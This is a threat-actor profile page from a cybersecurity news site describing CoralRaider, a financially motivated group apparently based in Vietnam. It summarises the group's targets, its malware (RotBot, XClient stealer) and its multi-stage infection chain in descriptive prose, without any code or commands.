Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Threat Actors

CoralRaider – Threat Actor

April 10, 2024
Reading Time: 8 mins read
in Threat Actors
CoralRaider  – Threat Actor

CoralRaider

Other Names

Unknown

Location

Vietnam

Date of initial activity

2023

Suspected attribution

State-sponsored threat group

Associated Groups

Unknown

Motivation

Data theft and hijacking social media accounts for financial gains

Associated tools

CoralRaider employs a variety of customized commodity malware families such as RotBot (QuasarRAT), XClient stealer, NetSupport RAT, AsyncRAT and Rhadamanthys.

Active

Yes

Overview

Cisco Talos recently uncovered a new threat actor known as “CoralRaider,” suspected to originate from Vietnam and motivated by financial gain. Operating since at least 2023, CoralRaider has targeted victims across various Asian and Southeast Asian countries. Their primary objective is to steal credentials, financial data, and social media accounts, including those associated with business and advertising.

In their campaigns, CoralRaider utilizes advanced tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer. Notably, they employ the dead drop technique, utilizing a legitimate service to host the command-and-control (C2) configuration file. Additionally, CoralRaider incorporates uncommon living-off-the-land binaries (LoLBins) like Windows Forfiles.exe and FoDHelper.exe into their operations, highlighting the group’s sophisticated and evolving cyber strategies.

Common targets

India, China, South Korea, Bangladesh, Pakistan, Indonesia, Vietnam.

Attack Vectors

The initial vector of the campaign is the Windows shortcut file. Researchers are unclear on the technique the actor used to deliver the LNKs to the victims.

How they operate

The attack commences when a user opens a malicious Windows shortcut file, triggering the download and execution of an HTML application file (HTA) from a server controlled by the attacker. Within the HTA file lies an embedded, obfuscated Visual Basic script, which is executed. This malicious script, in turn, triggers the execution of an embedded PowerShell script in memory. This PowerShell script, after decryption, sequentially executes three other PowerShell scripts. These scripts are designed to conduct anti-VM and anti-analysis checks, bypass User Access Controls, disable notifications from Windows and applications on the victim’s machine, and ultimately download and execute the RotBot. Upon its initial execution, RotBot, a variant of the QuasarRAT client, conducts evasion checks to avoid detection on the victim’s machine and performs system reconnaissance. Subsequently, RotBot connects to a host on a legitimate domain, likely controlled by the threat actor, to retrieve the configuration file necessary for connecting to the command-and-control (C2) server. In this campaign, CoralRaider utilizes the Telegram bot as the C2 channel. Once connected to the Telegram C2, RotBot loads the XClient stealer payload into the victim’s memory from its resources and executes its plugin program. The XClient stealer plugin conducts further anti-VM and anti-virus software checks on the victim’s system. It proceeds to gather various data, including browser information such as cookies, stored credentials, and financial details like credit card information. Additionally, the plugin harvests data from social media platforms like Facebook, Instagram, TikTok business ads, and YouTube, as well as application data from Telegram desktop and Discord applications on the victim’s machine. Screenshots of the victim’s desktop are captured and saved as PNG files in the temporary folder of the victim’s machine. Subsequently, the stealer plugin compiles the collected data from browsers and social media accounts into a text file, creates a ZIP archive, and exfiltrates both the PNG and ZIP files to the attacker’s Telegram bot C2.

Significant Attacks

CoralRaider” is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. (April 2024) References:
  • CoralRaider targets victims’ data and social media accounts.
  • Coralraider targets social media accounts.
Tags: BangladeshChinaCiscoCisco TalosCoralRaiderIndiaIndonesiaPakistanSouth KoreaThreat ActorsVietnamWindows
ADVERTISEMENT

Related Posts

Storm-1811 (Cybercriminal) – Threat Actor

Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
CopyCop (State-Sponsored) – Threat Actor

CopyCop (State-Sponsored) – Threat Actor

March 2, 2025
Storm-0539 – Threat Actor

Storm-0539 – Threat Actor

March 2, 2025
Void Manticore (Storm-0842) – Threat Actor

Void Manticore (Storm-0842) – Threat Actor

March 2, 2025
Unfading Sea Haze – Threat Actor

Unfading Sea Haze – Threat Actor

March 2, 2025
Ikaruz Red Team – Threat Actor

Ikaruz Red Team – Threat Actor

March 2, 2025

Latest Alerts

Google Removes 352 ‘IconAds’ Fraud Apps

Malicious Firefox Add Ons Steal Crypto Keys

Browser Cache Attack Bypasses Web Security

PDFs Deliver QR Codes in Callback Scams

Critical Sudo Flaws Expose Linux Systems

Unkillable Mac Malware From North Korea

Subscribe to our newsletter

    Latest Incidents

    Tech Incubator IdeaLab Discloses Data Breach

    Brazil’s CIEE One Exposes 248,000 Records

    McLaughlin & Stern Discloses Data Breach

    Cyberattack Hits Medtech Firm Surmodics

    Rhysida Ransomware Hits German Charity WHH

    Hacker Accesses Max Financial’s User Data

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial